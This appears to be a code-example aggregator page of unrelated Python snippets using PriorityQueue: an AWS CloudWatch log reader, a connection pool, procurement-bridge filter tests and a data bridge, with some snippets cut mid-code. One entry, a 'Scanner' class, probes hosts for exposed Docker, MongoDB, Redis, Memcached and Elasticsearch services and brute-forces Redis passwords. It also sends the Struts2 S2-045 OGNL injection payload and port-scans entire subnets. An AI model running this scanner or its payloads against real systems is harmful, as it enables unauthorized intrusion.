                   min(stream['lastEventTimestamp'], window_end):
                    yield stream['logStreamName']

            if 'nextToken' in response:
                next_token = response['nextToken']
            else:
                break

    def color(self, text, color):
        """Returns coloured version of ``text`` if ``color_enabled``."""
        if self.color_enabled:
            return colored(text, color)
        return text

    def parse_datetime(self, datetime_text):
        """Parse ``datetime_text`` into a ``datetime``."""
        if not datetime_text:
            return None

        ago_match = re.match(
            r'(\d+)\s?(m|minute|minutes|h|hour|hours|d|day|days|w|weeks|weeks)(?: ago)?',
            datetime_text)
        if ago_match:
            amount, unit = ago_match.groups()
            amount = int(amount)
            unit = {'m': 60, 'h': 3600, 'd': 86400, 'w': 604800}[unit[0]]
            date = datetime.now() + timedelta(seconds=unit * amount * -1)
        else:
            try:
                date = parse(datetime_text)
            except ValueError:
                raise exceptions.UnknownDateError(datetime_text)

        return int(date.strftime("%s")) * 1000
示例#22
0
文件: core.py 项目: antony-j/awslogs
class AWSLogs(object):

    ACTIVE = 1
    EXHAUSTED = 2
    WATCH_SLEEP = 2

    def __init__(self, **kwargs):
        self.connection_cls = kwargs.get('connection_cls', AWSConnection)
        self.aws_region = kwargs.get('aws_region')
        self.aws_access_key_id = kwargs.get('aws_access_key_id')
        self.aws_secret_access_key = kwargs.get('aws_secret_access_key')
        self.log_group_name = kwargs.get('log_group_name')
        self.log_stream_name = kwargs.get('log_stream_name')
        self.watch = kwargs.get('watch')
        self.color_enabled = kwargs.get('color_enabled')
        self.output_stream_enabled = kwargs.get('output_stream_enabled')
        self.output_group_enabled = kwargs.get('output_group_enabled')
        self.start = self.parse_datetime(kwargs.get('start'))
        self.end = self.parse_datetime(kwargs.get('end'))
        self.pool_size = max(kwargs.get('pool_size', 0), 10)
        self.max_group_length = 0
        self.max_stream_length = 0
        self.publishers = []
        self.events_queue = Queue()
        self.raw_events_queue = PriorityQueue()
        self.publishers_queue = PriorityQueue()
        self.publishers = []
        self.stream_status = {}
        self.stream_max_timestamp = {}
        self.connection = self.connection_cls(
            self.aws_region,
            aws_access_key_id=self.aws_access_key_id,
            aws_secret_access_key=self.aws_secret_access_key
        )

    def _get_streams_from_patterns(self, log_group_pattern, log_stream_pattern):
        """Returns pairs of group, stream matching ``log_group_pattern`` and
        ``log_stream_pattern``."""
        for group in self._get_groups_from_pattern(log_group_pattern):
            for stream in self._get_streams_from_pattern(group,
                                                         log_stream_pattern):
                yield group, stream

    def _get_groups_from_pattern(self, pattern):
        """Returns groups matching ``pattern``."""
        pattern = '.*' if pattern == 'ALL' else pattern
        reg = re.compile('^{0}'.format(pattern))
        for group in self.get_groups():
            if re.match(reg, group):
                yield group

    def _get_streams_from_pattern(self, group, pattern):
        """Returns streams in ``group`` matching ``pattern``."""
        pattern = '.*' if pattern == 'ALL' else pattern
        reg = re.compile('^{0}'.format(pattern))
        for stream in self.get_streams(group):
            if re.match(reg, stream):
                yield stream

    def _publisher_queue_consumer(self):
        """Consume ``publishers_queue`` api calls, run them and publish log
        events to ``raw_events_queue``. If ``nextForwardToken`` is present
        register a new api call into ``publishers_queue`` using as weight
        the timestamp of the latest event."""
        while True:
            try:
                _, (log_group_name, log_stream_name, next_token) = self.publishers_queue.get(block=False)
            except Empty:
                if self.watch:
                    gevent.sleep(self.WATCH_SLEEP)
                else:
                    break

            response = self.connection.get_log_events(
                next_token=next_token,
                log_group_name=log_group_name,
                log_stream_name=log_stream_name,
                start_time=self.start,
                end_time=self.end,
                start_from_head=True
            )

            if not len(response['events']):
                self.stream_status[(log_group_name, log_stream_name)] = self.EXHAUSTED
                continue

            self.stream_status[(log_group_name, log_stream_name)] = self.ACTIVE

            for event in response['events']:
                event['group'] = log_group_name
                event['stream'] = log_stream_name
                self.raw_events_queue.put((event['timestamp'], event))
                self.stream_max_timestamp[(log_group_name, log_stream_name)] = event['timestamp']

            if 'nextForwardToken' in response:
                self.publishers_queue.put(
                    (response['events'][-1]['timestamp'],
                     (log_group_name, log_stream_name, response['nextForwardToken']))
                )

    def _get_min_timestamp(self):
        """Return the minimum timestamp available across all active streams."""
        pending = [self.stream_max_timestamp[k] for k, v in self.stream_status.iteritems() if v != self.EXHAUSTED]
        return min(pending) if pending else None

    def _get_all_streams_exhausted(self):
        """Return if all streams are exhausted."""
        return all((s == self.EXHAUSTED for s in self.stream_status.itervalues()))

    def _raw_events_queue_consumer(self):
        """Consume events from ``raw_events_queue`` if all active streams
        have already publish events up to the ``_get_min_timestamp`` and
        register them in order into ``events_queue``."""
        while True:
            if self._get_all_streams_exhausted() and self.raw_events_queue.empty():
                if self.watch:
                    gevent.sleep(self.WATCH_SLEEP)
                    continue
                self.events_queue.put(NO_MORE_EVENTS)
                break

            try:
                timestamp, line = self.raw_events_queue.peek(timeout=1)
            except Empty:
                continue

            min_timestamp = self._get_min_timestamp()
            if min_timestamp and min_timestamp < timestamp:
                gevent.sleep(0.3)
                continue

            timestamp, line = self.raw_events_queue.get()

            output = [line['message']]
            if self.output_stream_enabled:
                output.insert(
                    0,
                    self.color(
                        line['stream'].ljust(self.max_stream_length, ' '),
                        'cyan'
                    )
                )
            if self.output_group_enabled:
                output.insert(
                    0,
                    self.color(
                        line['group'].ljust(self.max_group_length, ' '),
                        'green'
                    )
                )
            self.events_queue.put("{0}\n".format(' '.join(output)))

    def _events_consumer(self):
        """Print events from ``events_queue`` as soon as they are available."""
        while True:
            event = self.events_queue.get(True)
            if event == NO_MORE_EVENTS:
                break
            sys.stdout.write(event)
            sys.stdout.flush()

    def list_logs(self):
        self.register_publishers()

        pool = Pool(size=self.pool_size)
        pool.spawn(self._raw_events_queue_consumer)
        pool.spawn(self._events_consumer)

        if self.watch:
            pool.spawn(self.register_publishers_periodically)

        for i in xrange(self.pool_size):
            pool.spawn(self._publisher_queue_consumer)
        pool.join()

    def register_publishers(self):
        """Register publishers into ``publishers_queue``."""
        for group, stream in self._get_streams_from_patterns(self.log_group_name, self.log_stream_name):
            if (group, stream) in self.publishers:
                continue
            self.publishers.append((group, stream))
            self.max_group_length = max(self.max_group_length, len(group))
            self.max_stream_length = max(self.max_stream_length, len(stream))
            self.publishers_queue.put((0, (group, stream, None)))
            self.stream_status[(group, stream)] = self.ACTIVE
            self.stream_max_timestamp[(group, stream)] = -1

    def register_publishers_periodically(self):
        while True:
            self.register_publishers()
            gevent.sleep(2)

    def list_groups(self):
        """Lists available CloudWatch logs groups"""
        for group in self.get_groups():
            print group

    def list_streams(self, *args, **kwargs):
        """Lists available CloudWatch logs streams in ``log_group_name``."""
        for stream in self.get_streams(*args, **kwargs):
            print stream

    def get_groups(self):
        """Returns available CloudWatch logs groups"""
        next_token = None
        while True:
            response = self.connection.describe_log_groups(next_token=next_token)

            for group in response.get('logGroups', []):
                yield group['logGroupName']

            if 'nextToken' in response:
                next_token = response['nextToken']
            else:
                break

    def get_streams(self, log_group_name=None):
        """Returns available CloudWatch logs streams in ``log_group_name``."""
        log_group_name = log_group_name or self.log_group_name
        next_token = None

        while True:
            response = self.connection.describe_log_streams(
                log_group_name=log_group_name,
                next_token=next_token
            )

            for stream in response.get('logStreams', []):
                yield stream['logStreamName']

            if 'nextToken' in response:
                next_token = response['nextToken']
            else:
                break

    def color(self, text, color):
        """Returns coloured version of ``text`` if ``color_enabled``."""
        if self.color_enabled:
            return colored(text, color)
        return text

    def parse_datetime(self, datetime_text):
        """Parse ``datetime_text`` into a ``datetime``."""
        if not datetime_text:
            return None

        ago_match = re.match(r'(\d+)\s?(m|minute|minutes|h|hour|hours|d|day|days|w|weeks|weeks)(?: ago)?', datetime_text)
        if ago_match:
            amount, unit = ago_match.groups()
            amount = int(amount)
            unit = {'m': 60, 'h': 3600, 'd': 86400, 'w': 604800}[unit[0]]
            date = datetime.now() + timedelta(seconds=unit * amount * -1)
        else:
            try:
                date = parse(datetime_text)
            except ValueError:
                raise exceptions.UnknownDateError(datetime_text)

        return int(date.strftime("%s")) * 1000
示例#23
0
文件: _pool.py 项目: NotSqrt/vaurien
class FactoryPool(object):

    def __init__(self, factory, maxsize=200, timeout=60):
        self.factory = factory
        self.maxsize = maxsize
        self.timeout = timeout
        self.clients = PriorityQueue(maxsize)
        # If there is a maxsize, prime the queue with empty slots.
        if maxsize is not None:
            for _ in xrange(maxsize):
                self.clients.put(EMPTY_SLOT)

    @contextlib.contextmanager
    def reserve(self):
        """Context-manager to obtain a Client object from the pool."""
        ts, client = self._checkout_connection()
        try:
            yield client
        finally:
            self._checkin_connection(ts, client)

    def _checkout_connection(self):
        # If there's no maxsize, no need to block waiting for a connection.
        blocking = self.maxsize is not None

        # Loop until we get a non-stale connection, or we create a new one.
        while True:
            try:
                ts, client = self.clients.get(blocking)
            except Empty:
                # No maxsize and no free connections, create a new one.
                # XXX TODO: we should be using a monotonic clock here.
                # see http://www.python.org/dev/peps/pep-0418/
                now = int(time.time())
                return now, self.factory()
            else:
                now = int(time.time())
                # If we got an empty slot placeholder, create a new connection.
                if client is None:
                    return now, self.factory()
                # If the connection is not stale, go ahead and use it.
                if ts + self.timeout > now:
                    return ts, client
                # Otherwise, the connection is stale.
                # Close it, push an empty slot onto the queue, and retry.
                if hasattr(client, 'disconnect'):
                    client.disconnect()

                self.clients.put(EMPTY_SLOT)
                continue

    def _checkin_connection(self, ts, client):
        """Return a connection to the pool."""
        if hasattr(client, '_closed') and client._closed:
            self.clients.put(EMPTY_SLOT)
            return

        # If the connection is now stale, don't return it to the pool.
        # Push an empty slot instead so that it will be refreshed when needed.
        now = int(time.time())
        if ts + self.timeout > now:
            self.clients.put((ts, client))
        else:
            if self.maxsize is not None:
                self.clients.put(EMPTY_SLOT)
示例#24
0
class Scanner:
    def __init__(self):
        self.start_time = time.time()
        self.queue = PriorityQueue()
        self.history = []
        self.total_count = 0
        self.scan_count = 0
        self._load_target()
        self.outfile = open("log.log", 'w')
        self.console_width = getTerminalSize()[0] - 2

    def _print_msg(self, _msg=None, _found_msg=False):
        if _msg is None:
            msg = '%s TotalCount| %s Scanned in %.2f seconds' % (
                self.total_count, self.total_count - self.queue.qsize(),
                time.time() - self.start_time)
            sys.stdout.write('\r' + ' ' * (self.console_width - len(msg)) +
                             msg)
        else:
            sys.stdout.write('\r' + _msg + ' ' *
                             (self.console_width - len(_msg)) + '\n')
            self.outfile.write(_msg + '\n')
            self.outfile.flush()
            if _found_msg:
                msg = '%s TotalCount| %s Scanned in %.2f seconds' % (
                    self.total_count, self.total_count - self.queue.qsize(),
                    time.time() - self.start_time)
                sys.stdout.write('\r' + ' ' * (self.console_width - len(msg)) +
                                 msg)
        sys.stdout.flush()

    def _load_target(self):
        print('[+] Read targets ...')
        target_file = raw_input("Target File :")
        with open(target_file) as f:
            for line in f.xreadlines():
                target = line.strip()
                self.queue.put(target)

        print("TotalCount is %d" % self.queue.qsize())
        self.total_count = self.queue.qsize()
        print("Now scanning ...")

    def _scan(self, case):
        while not self.queue.empty():
            target = self.queue.get()
            if case == "1":
                self.vulnCheck(target)
            if case == "2":
                self.s2_045(target)
            if case == "3":
                self.headers(target)
            if case == "4":
                self.weakfile(target)
            if case == "5":
                self.portscan_c(target)

    def vulnCheck(self, target):
        if ":2375" in target:
            try:
                res = requests.head("http://" + str(target) +
                                    "/containers/json",
                                    timeout=2)
                if res.headers['Content-Type'] == 'application/json':
                    self._print_msg(target + "==>  docker api Vuln", True)
                else:
                    self._print_msg()
            except:
                self._print_msg()
            self._print_msg()

        if ":27017" in target:
            ip, port = target.split(":")
            try:
                socket.setdefaulttimeout(3)
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                s.connect((ip, int(port)))
                data = binascii.a2b_hex(
                    "3a000000a741000000000000d40700000000000061646d696e2e24636d640000000000ffffffff130000001069736d6173746572000100000000"
                )
                s.send(data)
                result = s.recv(1024)
                if "ismaster" in result:
                    getlog_data = binascii.a2b_hex(
                        "480000000200000000000000d40700000000000061646d696e2e24636d6400000000000100000021000000026765744c6f670010000000737461727475705761726e696e67730000"
                    )
                    s.send(getlog_data)
                    result = s.recv(1024)
                    if "totalLinesWritten" in result:
                        self._print_msg(target + "==>  mongodb Vuln", True)
            except Exception as e:
                pass

        if ":6379" in target:
            ip, port = target.split(":")
            try:
                socket.setdefaulttimeout(3)
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                s.connect((ip, int(port)))
                s.send("INFO\r\n")
                result = s.recv(1024)
                if "redis_version" in result:
                    self._print_msg(target + "==>  redis Vuln", True)
                elif "Authentication" in result:
                    for pass_ in ['123456', 'redis', 'pass', 'password']:
                        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                        s.connect((ip, int(port)))
                        s.send("AUTH %s\r\n" % (pass_))
                        result = s.recv(1024)
                        if '+OK' in result:
                            self._print_msg(
                                target + "==>  redis pass Vuln :" + pass_,
                                True)
            except Exception as e:
                pass
        if ":11211" in target:
            ip, port = target.split(":")
            try:
                socket.setdefaulttimeout(3)
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                s.connect((ip, int(port)))
                s.send("stats\r\n")
                result = s.recv(1024)
                if "STAT version" in result:
                    self._print_msg(target + "==>  memcache Vuln", True)
            except Exception as e:
                pass

        if ":9200" in target:
            try:
                res = requests.head("http://" + str(target) +
                                    "/_rvier/_search",
                                    timeout=2)
                if res.status_code == 200:
                    self._print_msg(target + "==>  Elasticsearch Vuln", True)
                else:
                    self._print_msg()
            except:
                self._print_msg()
            self._print_msg()

    def headers(self, target):
        try:
            res = requests.head("http://" + str(target), timeout=1)
            self._print_msg(target + "==>" + str(res.headers), True)
        except:
            self._print_msg()
        self._print_msg()

    def s2_045(self, target):
        try:
            data = {"image": " "}
            headers = {
                "User-Agent":
                "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36",
                "Content-Type":
                "%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('vul','s2-045')}.multtargetart/form-data"
            }
            req = requests.post("http://" + str(target),
                                data=data,
                                headers=headers)
            if req.headers["vul"] == "s2-045":
                self._print_msg(target + "==>" + "S2-045 Vuln", True)
        except:
            self._print_msg()
        self._print_msg()

    def weakfile(self, target):
        weaklist = ["robots.txt", "/i.php", "/phpinfo.php"]
        for weakfile in weaklist:
            try:
                res = requests.head("http://" + str(target) + weakfile,
                                    timeout=1)
                if res.status_code == 200:
                    if ("User-agent" in res.content) or ("phpinfo"
                                                         in res.content):
                        self._print_msg("http://" + target + weakfile, True)
            except:
                self._print_msg()
        self._print_msg()

    def portscan_c(self, target):
        import socket
        ip = socket.gethostbyname(target)
        ports = [1433, 2375, 3306, 6379, 9200, 11211, 27017]
        ip = ip.split(".")
        ipc = ip[0] + "." + ip[1] + "." + ip[2] + "."
        if ipc in self.history:
            return
        else:
            self.history.append(ipc)

        for port in ports:
            for i in range(255):
                try:
                    cs = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                    cs.settimeout(float(2.5))
                    address = (ipc + str(i), int(port))
                    status = cs.connect_ex((address))
                    if status == 0:
                        self._print_msg(ipc + str(i) + ":" + str(port), True)
                except Exception as e:
                    pass

                finally:
                    cs.close()
                self._print_msg()

    def run(self, case):
        threads = [gevent.spawn(self._scan, case) for i in xrange(1000)]
class TestResourceFilters(unittest.TestCase):
    db = {}
    conf = CONFIG

    @patch('openprocurement.bridge.basic.filters.INFINITY')
    @patch('openprocurement.bridge.basic.filters.logger')
    def test_JMESPathFilter(self, logger, infinity):
        self.input_queue = PriorityQueue()
        self.filtered_queue = PriorityQueue()

        resource = self.conf['resource'][:-1]
        jmes_filter = JMESPathFilter(self.conf, self.input_queue, self.filtered_queue, self.db)
        mock_calls = [call.info('Init Close Framework Agreement JMESPath Filter.')]
        self.assertEqual(logger.mock_calls, mock_calls)
        extra = {'MESSAGE_ID': 'SKIPPED', 'JOURNAL_{}_ID'.format(resource.upper()): 'test_id'}

        infinity.__nonzero__.side_effect = [True, False]
        jmes_filter._run()

        doc = {
            'id': 'test_id',
            'dateModified': '1970-01-01',
            'status': 'draft.pending'
        }

        self.input_queue.put((None, doc))
        self.db['test_id'] = '1970-01-01'
        infinity.__nonzero__.side_effect = [True, False]
        jmes_filter._run()
        mock_calls.append(
            call.info('{} test_id not modified from last check. Skipping'.format(resource.title()),
                      extra=extra)
        )
        self.assertEqual(logger.mock_calls, mock_calls)

        # no filters
        doc['dateModified'] = '1970-01-02'
        self.input_queue.put((None, doc))
        infinity.__nonzero__.side_effect = [True, False]
        jmes_filter._run()
        mock_calls.append(
            call.debug('Put to filtered queue {} test_id {}'.format(resource, doc['status']))
        )
        self.assertEqual(logger.mock_calls, mock_calls)
        priority, filtered_doc = self.filtered_queue.get()
        self.assertIsNone(priority)
        self.assertEqual(filtered_doc, doc)

        # not found
        jmes_filter.filters = [jmespath.compile("contains([`test_status`], status)")]
        doc['status'] = 'spam_status'
        self.input_queue.put((None, doc))
        infinity.__nonzero__.side_effect = [True, False]
        jmes_filter._run()
        mock_calls.append(
            call.info('Skip {} test_id'.format(resource),
                      extra=extra)
        )

        # has found
        doc['status'] = 'test_status'
        self.input_queue.put((None, doc))
        infinity.__nonzero__.side_effect = [True, False]
        jmes_filter._run()
        mock_calls.append(
            call.debug('Put to filtered queue {} test_id {}'.format(resource, doc['status']))
        )
        self.assertEqual(logger.mock_calls, mock_calls)
        priority, filtered_doc = self.filtered_queue.get()
        self.assertIsNone(priority)
        self.assertEqual(filtered_doc, doc)
示例#26
0
class TestContractProformaFilter(unittest.TestCase):
    conf = CONFIG
    db = {}

    @patch('openprocurement.bridge.templatesregistry.filters.INFINITY')
    def test_init(self, infinity):
        self.input_queue = PriorityQueue()
        self.filtered_queue = PriorityQueue()

        filter = ContractProformaFilter(self.conf, self.input_queue,
                                        self.filtered_queue, self.db)

        # Valid tender filtering
        infinity.__nonzero__.side_effect = [True, False]
        doc = {
            'id': 'test_id',
            'dateModified': '1970-01-02',
            'procurementMethodType': 'dgf',
            'status': 'status1',
            'documents': [{
                'documentType': 'contractProforma'
            }]
        }

        self.input_queue.put((None, deepcopy(doc)))
        filter._run()
        self.assertEqual(len(self.filtered_queue), 1)
        filtered_doc = self.filtered_queue.get(block=False)
        self.assertEqual(doc, filtered_doc[1])

        # Not changed dateModified
        infinity.__nonzero__.side_effect = [True, False]
        doc = {
            'id': 'test_id',
            'dateModified': '1970-01-01',
            'procurementMethodType': 'dgf',
            'status': 'status1',
            'documents': [{
                'documentType': 'contractProforma'
            }],
        }

        self.input_queue.put((None, deepcopy(doc)))
        self.db['test_id'] = '1970-01-01'

        filter._run()
        self.assertEqual(len(self.filtered_queue), 0)

        self.db.pop('test_id')

        # No contractProforma doc
        infinity.__nonzero__.side_effect = [True, False]
        doc = {
            'id': 'test_id',
            'dateModified': '1970-01-01',
            'procurementMethodType': 'dgf',
            'status': 'status1',
            'documents': [{
                'documentType': 'notContractProforma'
            }],
        }

        filter._run()
        self.assertEqual(len(self.filtered_queue), 0)

        # Wrong tender status
        infinity.__nonzero__.side_effect = [True, False]
        doc = {
            'id': 'test_id',
            'dateModified': '1970-01-01',
            'procurementMethodType': 'dgf',
            'status': 'status3',
            'documents': [{
                'documentType': 'contractProforma'
            }],
        }

        self.input_queue.put((None, deepcopy(doc)))

        filter._run()
        self.assertEqual(len(self.filtered_queue), 0)

        # Wrong procurementMethodType without appropriate status
        infinity.__nonzero__.side_effect = [True, False]
        doc = {
            'id': 'test_id',
            'dateModified': '1970-01-01',
            'procurementMethodType': 'other_pmt',
            'status': 'status1',
            'documents': [{
                'documentType': 'contractProforma'
            }],
        }
        self.input_queue.put((None, deepcopy(doc)))

        filter._run()
        self.assertEqual(len(self.filtered_queue), 0)

        # Wrong procurementMethodType with appropriate status
        infinity.__nonzero__.side_effect = [True, False]
        doc = {
            'id': 'test_id',
            'dateModified': '1970-01-01',
            'procurementMethodType': 'other_pmt',
            'status': 'status2',
            'documents': [{
                'documentType': 'contractProforma'
            }],
        }
        self.input_queue.put((None, deepcopy(doc)))

        filter._run()
        self.assertEqual(len(self.filtered_queue), 1)
class EdgeDataBridge(object):
    """Edge Bridge"""
    def __init__(self, config):
        super(EdgeDataBridge, self).__init__()
        self.config = config
        self.workers_config = {}
        self.bridge_id = uuid.uuid4().hex
        self.api_host = self.config_get('resources_api_server')
        self.api_version = self.config_get('resources_api_version')
        self.retrievers_params = self.config_get('retrievers_params')

        # Check up_wait_sleep
        up_wait_sleep = self.retrievers_params.get('up_wait_sleep')
        if up_wait_sleep is not None and up_wait_sleep < 30:
            raise DataBridgeConfigError('Invalid \'up_wait_sleep\' in '
                                        '\'retrievers_params\'. Value must be '
                                        'grater than 30.')

        # Workers settings
        for key in WORKER_CONFIG:
            self.workers_config[key] = (self.config_get(key)
                                        or WORKER_CONFIG[key])

        # Init config
        for key in DEFAULTS:
            setattr(self, key, self.config_get(key) or DEFAULTS[key])

        # Pools
        self.workers_pool = gevent.pool.Pool(self.workers_max)
        self.retry_workers_pool = gevent.pool.Pool(self.retry_workers_max)
        self.filter_workers_pool = gevent.pool.Pool(self.filter_workers_count)

        # Queues
        if self.input_queue_size == -1:
            self.input_queue = PriorityQueue()
        else:
            self.input_queue = PriorityQueue(self.input_queue_size)

        if self.resource_items_queue_size == -1:
            self.resource_items_queue = PriorityQueue()
        else:
            self.resource_items_queue = PriorityQueue(
                self.resource_items_queue_size)

        self.api_clients_queue = Queue()
        # self.retry_api_clients_queue = Queue()

        if self.retry_resource_items_queue_size == -1:
            self.retry_resource_items_queue = PriorityQueue()
        else:
            self.retry_resource_items_queue = PriorityQueue(
                self.retry_resource_items_queue_size)

        if self.api_host != '' and self.api_host is not None:
            api_host = urlparse(self.api_host)
            if api_host.scheme == '' and api_host.netloc == '':
                raise DataBridgeConfigError(
                    'Invalid \'tenders_api_server\' url.')
        else:
            raise DataBridgeConfigError('In config dictionary empty or missing'
                                        ' \'tenders_api_server\'')
        self.db = prepare_couchdb(self.couch_url, self.db_name, logger)
        db_url = self.couch_url + '/' + self.db_name
        prepare_couchdb_views(db_url, self.workers_config['resource'], logger)
        self.server = Server(self.couch_url,
                             session=Session(retry_delays=range(10)))
        self.view_path = '_design/{}/_view/by_dateModified'.format(
            self.workers_config['resource'])
        extra_params = {
            'mode': self.retrieve_mode,
            'limit': self.resource_items_limit
        }
        self.feeder = ResourceFeeder(host=self.api_host,
                                     version=self.api_version,
                                     key='',
                                     resource=self.workers_config['resource'],
                                     extra_params=extra_params,
                                     retrievers_params=self.retrievers_params,
                                     adaptive=True,
                                     with_priority=True)
        self.api_clients_info = {}

    def config_get(self, name):
        try:
            return self.config.get('main').get(name)
        except AttributeError:
            raise DataBridgeConfigError('In config dictionary missed section'
                                        ' \'main\'')

    def create_api_client(self):
        client_user_agent = self.user_agent + '/' + self.bridge_id
        timeout = 0.1
        while 1:
            try:
                api_client = APIClient(
                    host_url=self.api_host,
                    user_agent=client_user_agent,
                    api_version=self.api_version,
                    key='',
                    resource=self.workers_config['resource'])
                client_id = uuid.uuid4().hex
                logger.info('Started api_client {}'.format(
                    api_client.session.headers['User-Agent']),
                            extra={'MESSAGE_ID': 'create_api_clients'})
                api_client_dict = {
                    'id': client_id,
                    'client': api_client,
                    'request_interval': 0,
                    'not_actual_count': 0
                }
                self.api_clients_info[api_client_dict['id']] = {
                    'drop_cookies': False,
                    'request_durations': {},
                    'request_interval': 0,
                    'avg_duration': 0
                }
                self.api_clients_queue.put(api_client_dict)
                break
            except RequestFailed as e:
                logger.error(
                    'Failed start api_client with status code {}'.format(
                        e.status_code),
                    extra={'MESSAGE_ID': 'exceptions'})
                timeout = timeout * 2
                logger.info(
                    'create_api_client will be sleep {} sec.'.format(timeout))
                sleep(timeout)
            except Exception as e:
                logger.error('Failed start api client with error: {}'.format(
                    e.message),
                             extra={'MESSAGE_ID': 'exceptions'})
                timeout = timeout * 2
                logger.info(
                    'create_api_client will be sleep {} sec.'.format(timeout))
                sleep(timeout)

    def fill_api_clients_queue(self):
        while self.api_clients_queue.qsize() < self.workers_min:
            self.create_api_client()

    def fill_input_queue(self):
        for resource_item in self.feeder.get_resource_items():
            self.input_queue.put(resource_item)
            logger.debug('Add to temp queue from sync: {} {} {}'.format(
                self.workers_config['resource'][:-1], resource_item[1]['id'],
                resource_item[1]['dateModified']),
                         extra={
                             'MESSAGE_ID': 'received_from_sync',
                             'TEMP_QUEUE_SIZE': self.input_queue.qsize()
                         })

    def send_bulk(self, input_dict, priority_cache):
        sleep_before_retry = 2
        for i in xrange(0, 3):
            try:
                logger.debug('Send check bulk: {}'.format(len(input_dict)),
                             extra={'CHECK_BULK_LEN': len(input_dict)})
                start = time()
                rows = self.db.view(self.view_path, keys=input_dict.values())
                end = time() - start
                logger.debug('Duration bulk check: {} sec.'.format(end),
                             extra={'CHECK_BULK_DURATION': end * 1000})
                resp_dict = {k.id: k.key for k in rows}
                break
            except (IncompleteRead, Exception) as e:
                logger.error('Error while send bulk {}'.format(e.message),
                             extra={'MESSAGE_ID': 'exceptions'})
                if i == 2:
                    raise e
                sleep(sleep_before_retry)
                sleep_before_retry *= 2
        for item_id, date_modified in input_dict.items():
            if item_id in resp_dict and date_modified == resp_dict[item_id]:
                logger.debug('Skipped {} {}: In db exist newest.'.format(
                    self.workers_config['resource'][:-1], item_id),
                             extra={'MESSAGE_ID': 'skipped'})
            elif ((1, item_id) not in self.resource_items_queue.queue
                  and (1000, item_id) not in self.resource_items_queue.queue):
                self.resource_items_queue.put(
                    (priority_cache[item_id], item_id))
                logger.debug(
                    'Put to main queue {}: {}'.format(
                        self.workers_config['resource'][:-1], item_id),
                    extra={'MESSAGE_ID': 'add_to_resource_items_queue'})
            else:
                logger.debug(
                    'Skipped {} {}: In queue exist with same id'.format(
                        self.workers_config['resource'][:-1], item_id),
                    extra={'MESSAGE_ID': 'skipped'})

    def fill_resource_items_queue(self):
        start_time = datetime.now()
        input_dict = {}
        priority_cache = {}
        while True:
            # Get resource_item from temp queue
            if not self.input_queue.empty():
                priority, resource_item = self.input_queue.get()
            else:
                timeout = self.bulk_query_interval -\
                    (datetime.now() - start_time).total_seconds()
                if timeout > self.bulk_query_interval:
                    timeout = self.bulk_query_interval
                try:
                    priority, resource_item = self.input_queue.get(
                        timeout=timeout)
                except Empty:
                    resource_item = None

            # Add resource_item to bulk
            if resource_item is not None:
                logger.debug('Add to input_dict {}'.format(
                    resource_item['id']))
                input_dict[resource_item['id']] = resource_item['dateModified']
                priority_cache[resource_item['id']] = priority

            if (len(input_dict) >= self.bulk_query_limit
                    or (datetime.now() - start_time).total_seconds() >=
                    self.bulk_query_interval):
                if len(input_dict) > 0:
                    self.send_bulk(input_dict, priority_cache)
                    input_dict = {}
                    priority_cache = {}
                start_time = datetime.now()

    def resource_items_filter(self, r_id, r_date_modified):
        try:
            local_document = self.db.get(r_id)
            if local_document:
                if local_document['dateModified'] < r_date_modified:
                    return True
                else:
                    return False
            else:
                return True
        except Exception as e:
            logger.error(
                'Filter error: Error while getting {} {} from couchdb: '
                '{}'.format(self.workers_config['resource'][:-1], r_id,
                            e.message),
                extra={'MESSAGE_ID': 'exceptions'})
            return True

    def _get_average_requests_duration(self):
        req_durations = []
        delta = timedelta(seconds=self.perfomance_window)
        current_date = datetime.now() - delta
        for cid, info in self.api_clients_info.items():
            if len(info['request_durations']) > 0:
                if min(info['request_durations'].keys()) <= current_date:
                    info['grown'] = True
                avg = round(
                    sum(info['request_durations'].values()) * 1.0 /
                    len(info['request_durations']), 3)
                req_durations.append(avg)
                info['avg_duration'] = avg

        if len(req_durations) > 0:
            return round(sum(req_durations) / len(req_durations),
                         3), req_durations
        else:
            return 0, req_durations

    # TODO: Add logic for restart sync if last response grater than some values
    # and no active tasks specific for resource

    def queues_controller(self):
        while True:
            if (self.workers_pool.free_count() > 0
                    and (self.resource_items_queue.qsize() >
                         ((float(self.resource_items_queue_size) / 100) *
                          self.workers_inc_threshold))):
                self.create_api_client()
                w = ResourceItemWorker.spawn(self.api_clients_queue,
                                             self.resource_items_queue,
                                             self.db, self.workers_config,
                                             self.retry_resource_items_queue,
                                             self.api_clients_info)
                self.workers_pool.add(w)
                logger.info('Queue controller: Create main queue worker.')
            elif (self.resource_items_queue.qsize() <
                  ((float(self.resource_items_queue_size) / 100) *
                   self.workers_dec_threshold)):
                if len(self.workers_pool) > self.workers_min:
                    wi = self.workers_pool.greenlets.pop()
                    wi.shutdown()
                    api_client_dict = self.api_clients_queue.get()
                    del self.api_clients_info[api_client_dict['id']]
                    logger.info('Queue controller: Kill main queue worker.')
            filled_resource_items_queue = round(
                self.resource_items_queue.qsize() /
                (float(self.resource_items_queue_size) / 100), 2)
            logger.info('Resource items queue filled on {} %'.format(
                filled_resource_items_queue))
            filled_retry_resource_items_queue \
                = round(self.retry_resource_items_queue.qsize() / float(
                    self.retry_resource_items_queue_size) / 100, 2)
            logger.info('Retry resource items queue filled on {} %'.format(
                filled_retry_resource_items_queue))
            sleep(self.queues_controller_timeout)

    def gevent_watcher(self):
        self.perfomance_watcher()
        for t in self.server.tasks():
            if (t['type'] == 'indexer' and t['database'] == self.db_name
                    and t.get('design_document', None) == '_design/{}'.format(
                        self.workers_config['resource'])):
                logger.info(
                    'Watcher: Waiting for end of view indexing. Current'
                    ' progress: {} %'.format(t['progress']))

        # Check fill threads
        input_threads = 1
        if self.input_queue_filler.ready():
            input_threads = 0
            logger.error('Temp queue filler error: {}'.format(
                self.input_queue_filler.exception.message),
                         extra={'MESSAGE_ID': 'exception'})
            self.input_queue_filler = spawn(self.fill_input_queue)
        logger.info('Input threads {}'.format(input_threads),
                    extra={'INPUT_THREADS': input_threads})
        fill_threads = 1
        if self.filler.ready():
            fill_threads = 0
            logger.error('Fill thread error: {}'.format(
                self.filler.exception.message),
